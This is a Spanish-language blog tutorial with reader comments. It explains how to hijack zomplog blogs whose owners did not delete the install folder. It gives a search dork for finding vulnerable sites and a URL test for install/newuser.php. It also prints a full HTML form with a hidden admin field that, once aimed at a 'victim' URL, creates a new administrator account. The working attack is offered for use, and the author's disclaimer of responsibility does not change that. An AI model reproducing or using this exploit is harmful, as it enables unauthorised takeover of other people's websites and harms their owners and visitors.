Bienvenidos a este nuevo tutorial de GiR como ya os imagináis.
Este tutorial sera el primero que hago escrito y mas o menos encierta manera es el xploit de los blogs echos con el sistema zomplog, pero en castellano y para que todos lo entiendan y sepan por que pasa lo que pasa. Comenzamos entonces…
Bien, zomplog es un sistema de blog como tantos otros y posee un instalador que permite que dicho proceso de instalacion sea menos pesado para el administrador. El problema surge cuando el administrador, llamemoslo poco listo, no borra la carpeta install… Al no borrar el dicha carpeta el blog es vulnerable. Veamos por que.
Al no borrar la carpeta quedan al descubierto los proesos de crear un admin y se pueden volver a ejecutar, la vulnerabilidad que esta ubicada en install/newuser.php, para saber si una web es vulnerable solo tenemos que hacer este cambio en la url:
http://victima.com/blog/index.php >> http://victima.com/blog/install/newuser.php
Si nos muestra una pagina con la parte superior roja, la web es vulnerable, si nos sale un ERROR 404 el admin fue listo y borro el directorio por lo tanto a seguir buscando, porque la web no es vulnerable. Se me olvidaba: para encontra una web vulnerable con este tipo de fallo tenemos que usar el DORK: “Powered by zomplog.” Es decir tenemos que poner el buscador que usemos habitualmente,”Powered by zomplog”, para que nos muestre todas las webs que usan zomplog.
Sigamos con el tutorial, si la web es vulnerable, es decir en install/newuser.php nos muestra una pagina lo que tenemos que hacer es crear el formulario de registro del admin con lo que volveremos a hacer el proceso de crear un admin, para eso lo que tenemos que hacer es mirar el codigo fuente del script y obtener los nombres de la base de datos y los campos etc… yo lo hice y a partir de eso elabore un formulario, el cual es el siguiente:
<br><b><center>agregar administrador</center></b><br><br>
<form action=”AQUI URL DE LA VICTIMA” method=”POST”>
<p>Titulo del blog<br /><input type=”text” name=”weblog_title” maxlength=”40″ id=”blogname” />
<br />
<br />
Usuario<br />
<input type=”text” name=”login” maxlength=”15″ id=”name” /><br />
<br />
Password<br />
<input type=”password” name=”password” maxlength=”15″ id=”pwd” />
<br />
<br />
Confirma el password<br /><input type=”password” name=”password2″ maxlength=”15″ id=”pwd2″ />
<br />
<br />
<input name=”admin” type=”hidden” id=”admin” value=”1″ /><input name=”submit_user” type=”submit” value=”Submit ››” id=”submit” />
</p>
</form>
Ya solo nos queda sustituir la segunda linea del codigo. Aqui un ejemplo
<form action=”AQUI URL DE LA VICTIMA” method=”POST”> SIN EDITAR
POR LA URL DE LA VICTIMA
<form action=”http://victima.com/blog/install/newuser.php” method=”POST”> EDITADO
Este archivo lo tenemos que guardar con el nombre que a nostros nos plazca en extesion *.html una vez guardado lo tenemos que hostear en internet, usando un ftp.
Con esto lo que aremos sera ejecutar la accion que contiene newuser.php que es crear un administrador… con los datos que nostros le hemos proporcionado en el formulario.
Es decir al ejecutar el archivo html con el formulario de registro de admin. Tendremos un admin en el blog y podremos hacer lo que nos plazca dentro de los limites del blog.
Si quieres este documento para tu blog o foro pide permiso al autor GiR.
No me hago responsable del uso que den los lecteros de este manual, a lo aqui aprendido.
Un saludo cordial, GiR
Mayo 19, 2008 a las 7:17 pm |
gracias por el tuto
esto se puede hacer en todas las paginas que no haigan borrado la carpeta install no?
Enero 4, 2009 a las 5:16 pm |
Claro, las paginas que hayan borrado la carpeta install, no podras acerlo
Marzo 4, 2009 a las 6:33 am |
[b]No entiendo;
¿De donde obtenemos los datos de la base de datos?
Saludos!
[/b]